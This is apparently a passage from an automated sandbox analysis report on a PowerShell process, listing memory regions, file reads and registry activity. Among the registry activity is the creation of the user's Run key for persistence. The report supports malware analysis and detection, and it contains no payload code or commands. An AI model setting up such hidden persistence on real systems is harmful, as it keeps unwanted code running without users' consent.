private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True True False
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True True False
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000130000 0x00130000 0x00130fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False
private_0x0000000000150000 0x00150000 0x0018ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable True False False
private_0x00000000001b0000 0x001b0000 0x001effff Private Memory Readable, Writable True True False
pagefile_0x00000000001f0000 0x001f0000 0x001f0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000200000 0x00200000 0x00200fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000210000 0x00210000 0x00210fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000220000 0x00220000 0x0025ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000270000 0x00270000 0x0027ffff Private Memory True True False
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True True False
private_0x00000000002c0000 0x002c0000 0x002cffff Private Memory True True False
private_0x00000000002d0000 0x002d0000 0x002dffff Private Memory True True False
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory True True False
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True True False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00340000 0x0036ffff Memory Mapped File Readable True False False
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory True True False
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory True True False
private_0x0000000000390000 0x00390000 0x0040ffff Private Memory Readable, Writable True True False
private_0x0000000000410000 0x00410000 0x0050ffff Private Memory Readable, Writable True True False
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable True True False
l_intl.nls 0x00520000 0x00522fff Memory Mapped File Readable False False False
private_0x0000000000530000 0x00530000 0x00530fff Private Memory Readable, Writable True True False
private_0x0000000000540000 0x00540000 0x0063ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000640000 0x00640000 0x007c7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000007d0000 0x007d0000 0x00950fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000960000 0x00960000 0x01d5ffff Pagefile Backed Memory Readable True False False
private_0x0000000001d60000 0x01d60000 0x01e5ffff Private Memory Readable, Writable True True False
sorttbls.nlp 0x01e60000 0x01e64fff Memory Mapped File Readable False False False
microsoft.wsman.runtime.dll 0x01e70000 0x01e77fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000001e80000 0x01e80000 0x01ebffff Private Memory Readable, Writable True True False
pagefile_0x0000000001ec0000 0x01ec0000 0x01ec0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001ed0000 0x01ed0000 0x01ed0fff Pagefile Backed Memory Readable True False False
private_0x0000000001ee0000 0x01ee0000 0x01f1ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000001f30000 0x01f30000 0x01f3ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001f40000 0x01f40000 0x0201efff Pagefile Backed Memory Readable True False False
private_0x0000000002040000 0x02040000 0x0207ffff Private Memory Readable, Writable True True False
sortdefault.nls 0x02080000 0x0234efff Memory Mapped File Readable False False False
pagefile_0x0000000002350000 0x02350000 0x02742fff Pagefile Backed Memory Readable True False False
private_0x0000000002790000 0x02790000 0x027cffff Private Memory Readable, Writable True True False
private_0x0000000002800000 0x02800000 0x0283ffff Private Memory Readable, Writable True True False
private_0x0000000002870000 0x02870000 0x0287ffff Private Memory Readable, Writable True True False
private_0x0000000002880000 0x02880000 0x028bffff Private Memory Readable, Writable True True False
private_0x00000000028d0000 0x028d0000 0x0290ffff Private Memory Readable, Writable True True False
private_0x0000000002950000 0x02950000 0x0298ffff Private Memory Readable, Writable True True False
private_0x0000000002990000 0x02990000 0x02a8ffff Private Memory Readable, Writable True True False
sortkey.nlp 0x02a90000 0x02ad0fff Memory Mapped File Readable False False False
private_0x0000000002b10000 0x02b10000 0x02b4ffff Private Memory Readable, Writable True True False
private_0x0000000002b50000 0x02b50000 0x04b4ffff Private Memory Readable, Writable True False False
private_0x0000000004b50000 0x04b50000 0x04beffff Private Memory Readable, Writable True True False
kernelbase.dll.mui 0x04bf0000 0x04caffff Memory Mapped File Readable, Writable False False False
system.transactions.dll 0x04cb0000 0x04cf2fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000004d40000 0x04d40000 0x04d7ffff Private Memory Readable, Writable True True False
system.management.automation.dll 0x04d80000 0x05061fff Memory Mapped File Readable, Writable, Executable False False False
powershell.exe 0x22550000 0x225c1fff Memory Mapped File Readable, Writable, Executable False False False
culture.dll 0x60340000 0x60347fff Memory Mapped File Readable, Writable, Executable True False False
system.transactions.dll 0x67aa0000 0x67ae2fff Memory Mapped File Readable, Writable, Executable False False False
system.management.automation.ni.dll 0x71910000 0x72189fff Memory Mapped File Readable, Writable, Executable True False False
system.ni.dll 0x72190000 0x7292bfff Memory Mapped File Readable, Writable, Executable True False False
mscorlib.ni.dll 0x72930000 0x73427fff Memory Mapped File Readable, Writable, Executable True False False
system.transactions.ni.dll 0x735d0000 0x7366bfff Memory Mapped File Readable, Writable, Executable True False False
system.core.ni.dll 0x73670000 0x738a4fff Memory Mapped File Readable, Writable, Executable True False False
uxtheme.dll 0x738b0000 0x7392ffff Memory Mapped File Readable, Writable, Executable False False False
microsoft.wsman.management.ni.dll 0x73990000 0x73a14fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.diagnostics.ni.dll 0x73a20000 0x73a6afff Memory Mapped File Readable, Writable, Executable True False False
wow64win.dll 0x73a70000 0x73acbfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73ad0000 0x73b0efff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x73b40000 0x73b47fff Memory Mapped File Readable, Writable, Executable False False False
system.management.automation.dll 0x73d70000 0x74051fff Memory Mapped File Readable, Writable, Executable False False False
microsoft.powershell.consolehost.ni.dll 0x74060000 0x740e0fff Memory Mapped File Readable, Writable, Executable True False False
msvcr80.dll 0x740f0000 0x7418afff Memory Mapped File Readable, Writable, Executable False False False
mscorwks.dll 0x74190000 0x7473afff Memory Mapped File Readable, Writable, Executable True False False
mscoreei.dll 0x74740000 0x747b7fff Memory Mapped File Readable, Writable, Executable True False False
rsaenh.dll 0x747c0000 0x747fafff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74800000 0x74815fff Memory Mapped File Readable, Writable, Executable False False False
slc.dll 0x74820000 0x74829fff Memory Mapped File Readable, Writable, Executable False False False
cscapi.dll 0x74830000 0x7483afff Memory Mapped File Readable, Writable, Executable False False False
srvcli.dll 0x74840000 0x74858fff Memory Mapped File Readable, Writable, Executable False False False
ntshrui.dll 0x74860000 0x748cffff Memory Mapped File Readable, Writable, Executable False False False
shdocvw.dll 0x748d0000 0x748fdfff Memory Mapped File Readable, Writable, Executable False False False
system.configuration.install.ni.dll 0x748d0000 0x748f4fff Memory Mapped File Readable, Writable, Executable True False False
apphelp.dll 0x74900000 0x7494bfff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x74950000 0x74a44fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74a50000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False
linkinfo.dll 0x74b40000 0x74b48fff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x74b50000 0x74b99fff Memory Mapped File Readable, Writable, Executable True False False
atl.dll 0x74ba0000 0x74bb3fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x74c20000 0x74c28fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74dd0000 0x74df0fff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x74e00000 0x74e0afff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x74e10000 0x74fadfff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x750b0000 0x750bbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x750c0000 0x7511ffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75120000 0x7521ffff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x75220000 0x75231fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x75240000 0x75258fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75260000 0x7530bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75320000 0x75365fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x75370000 0x75374fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x753c0000 0x754affff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754b0000 0x754d6fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x754e0000 0x7556ffff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75570000 0x756cbfff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x756d0000 0x75752fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75790000 0x763d9fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x763e0000 0x7646efff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x765b0000 0x766bffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76750000 0x76759fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x76760000 0x767fffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76a00000 0x76acbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x76ad0000 0x76b2ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76b30000 0x76bccfff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x76ce0000 0x76d24fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x76f60000 0x770fcfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x77100000 0x77156fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077160000 0x77160000 0x77259fff Private Memory Readable, Writable, Executable True True False
private_0x0000000077260000 0x77260000 0x7737efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77380000 0x77528fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77560000 0x776dffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True True False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True True False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True True False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
For performance reasons, the remaining 48 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
File (298)
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2 Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2 Fn
Get Info C:\Windows\syswow64\windowspowershell\v1.0\powershell.config type = file_attributes False 1 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0 type = file_attributes True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_type True 2 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_type True 2 Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz type = file_attributes True 5 Fn
Get Info C:\ type = file_attributes True 6 Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Desktop type = file_attributes True 7 Fn
Get Info C:\Users type = file_attributes True 4 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1 Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1 Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1 Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1 Fn
Open STD_INPUT_HANDLE True 1 Fn
Open STD_OUTPUT_HANDLE True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 4096 True 21 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 3687 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 409, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 4 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 2228 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 844, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 4 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 3736 True 1 Fn, Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 360, size_out = 0 True 1 Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 0 True 1 Fn
Write CONOUT$ size = 1 True 1 Fn, Data
Write CONOUT$ size = 2 True 1 Fn, Data
Registry (193)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 1 Fn
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 True 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1 Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1 Fn
Open Key HKEY_CURRENT_USER\Environment True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 2 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 6 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 3 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 2 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 4 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1 Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1 Fn
